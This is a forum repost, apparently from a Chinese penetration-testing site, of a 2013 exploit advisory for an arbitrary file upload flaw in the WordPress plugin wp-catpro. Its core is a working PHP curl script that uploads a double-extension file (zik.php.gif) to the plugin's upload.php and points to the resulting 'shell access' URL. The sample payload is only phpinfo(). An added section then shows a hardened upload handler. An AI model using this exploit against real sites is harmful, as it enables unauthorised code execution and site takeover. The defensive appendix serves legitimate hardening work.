中国网络渗透测试联盟 (China Network Penetration Testing Alliance)
Title: WordPress plugin wp-catpro arbitrary file upload
Author: admin
Date: 2013-2-27 20:12
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
Author => Zikou-16
Email => zikou16x@gmail.com
Tested on : Windows 7, Backtrack 5r3
Download : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
#=> Exploit info:
------------------
# An attacker can upload file/shell.php.gif
# ("jpg", "gif", "png") // Allowed file extensions
# "/uploads/"; // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
#=> Exploit
-----------
<?php
$uploadfile = "zik.php.gif";
$ch = curl_init("http://[www.2cto.com]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata' => "@$uploadfile",
          'folder'   => '/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
// Shell Access : http://[www.xxx.com]/[path]/wp-content/uploads/catpro/random_name.php.gif
?>

// Contents of the uploaded test file (zik.php.gif):
<?php
phpinfo();
?>
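For comparison, an added example (not wp-catpro's code and not part of the original post) of how an upload handler for this form field could be hardened against the double-extension trick above: it accepts only a single allowed extension, verifies that the bytes really are an image of that type, ignores any client-supplied folder, and stores the file under a server-chosen random name. It assumes PHP 7+ with the fileinfo extension; UPLOAD_DIR is a hypothetical fixed path.

```php
<?php
// Added example, not wp-catpro's code (assumes PHP 7+ with ext/fileinfo).
// Hypothetical fixed destination; never taken from a request field such as
// the "folder" parameter the vulnerable handler accepts.
define('UPLOAD_DIR', __DIR__ . '/uploads/catpro');
function validate_image_upload(array $file, array $allowed = array('jpg', 'gif', 'png'))
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        return array(false, 'upload failed');
    }
    // Require exactly one extension: "shell.php.gif" splits into three
    // parts and is refused even though its last extension is on the list.
    $parts = explode('.', basename($file['name']));
    if (count($parts) !== 2) {
        return array(false, 'exactly one extension is required');
    }
    $ext = strtolower($parts[1]);
    if (!in_array($ext, $allowed, true)) {
        return array(false, 'extension not allowed');
    }
    // Check the bytes, not just the name: the sniffed MIME type must match
    // the extension, and the file must actually parse as an image.
    $mime_by_ext = array('jpg' => 'image/jpeg', 'gif' => 'image/gif', 'png' => 'image/png');
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $mime = finfo_file($finfo, $file['tmp_name']);
    finfo_close($finfo);
    if ($mime !== $mime_by_ext[$ext] || getimagesize($file['tmp_name']) === false) {
        return array(false, 'content is not a ' . $ext . ' image');
    }
    return array(true, $ext);
}
function store_image_upload(array $file)
{
    list($ok, $info) = validate_image_upload($file);
    if (!$ok) {
        return array(false, $info);
    }
    // Server-chosen random name; the client's filename is discarded entirely.
    $target = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $info;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        return array(false, 'could not store file');
    }
    return array(true, $target);
}
if (isset($_FILES['Filedata'])) {
    list($ok, $msg) = store_image_upload($_FILES['Filedata']);
    header('Content-Type: text/plain');
    echo $ok ? 'stored' : 'rejected: ' . $msg;
}
```

Pair this with a web-server rule that disables script execution under the uploads directory, so that a file which slips past validation is still served as static content rather than run as PHP.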
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/)